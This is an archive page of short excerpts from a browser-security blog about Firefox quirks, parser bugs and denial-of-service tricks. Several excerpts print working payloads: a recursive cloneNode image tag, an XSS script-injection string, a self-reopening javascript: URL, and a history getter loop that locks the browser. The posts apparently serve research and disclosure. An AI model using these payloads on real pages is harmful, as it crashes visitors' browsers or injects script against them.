Archives for the ‘Firefox’ Category

Firefox knows what your friends did last summer

Update… Mozilla have now fixed the problem on Thursday. Not only did they take down the original release but fixed it very quickly within two days which is very impressive. Good work! I was writing some JavaScript and found that the following happens: /undefined/.test(undefined)//true The undefined value is converted to a string and then the […]

Breaking HTML parsers for fun

I was experimenting with some HTML vectors to break the various HTML parsers in the browsers, I wanted to continue till I found a cool one for Firefox because I like to bully the memory hogging browser as I use it a lot. I found some weird rendering in Firefox, Chrome and Opera. It started […]

Can all mozilla people look away now please

Custom setters syntax are being removed from Firefox in the next version.. boo I here you say well at least some of you. If you don’t know Firefox decided it would create it’s own setter syntax (I love it when you do that you know) ages ago and it looked something like this:- a setter=alert,a=1//calls […]

DOM DOS Firefox

Check this DOS in Firefox:- <img src="" onerror="appendChild(cloneNode(appendChild(cloneNode(1))))"> There are many DOM related Firefox problems, this was one of the more interesting ones I found

WebFu crouching tab hidden dos

Hello my student here I’ll show you the way of the tiger, if a deadly Firefox ninja approaches your dojo with a XSS punch:- "><script>alert(/XSS PUNCH!/)</script> Then you can respond with the crouching tab hidden dos move:- self.location = “javascript:window.open(‘javascript:document.clear(); document.open();document.close();self.location=self.location’)”; This move can frustrate your opponent into submission.

Firefox history DOS attack

Here’s a complete DOS attack on Firefox using the history object:- window.onload = function() { history.__defineGetter__(“x”, function() { for(i in this) { try { alert(this[i]); } catch(e) { } } }); history.x; } Tested on Firefox 2.0.0.9 mac, a window pops up with two blank buttons and you are unable to do anything without using […]

Spoofing Firefox protected objects

I’ve been hacking Firefox in my spare time and I thought that it had adequate protection against spoofing properties like document.domain. I was wrong This could turn into a browser exploit in future if the spoofed objects are accepted by Firefox internally (I don’t think they are, but you never know 😉 ). There are […]

Noscript has iframe protection

For those of you that read my blog you’ll know that I’m not a big fan of iframes for various reasons. I wrote a Javascript/CSS scanner which uses them to scan a local area network. There was no easy way to actually prevent this stuff until now….noscript now has iframe protection which is fantastic news, […]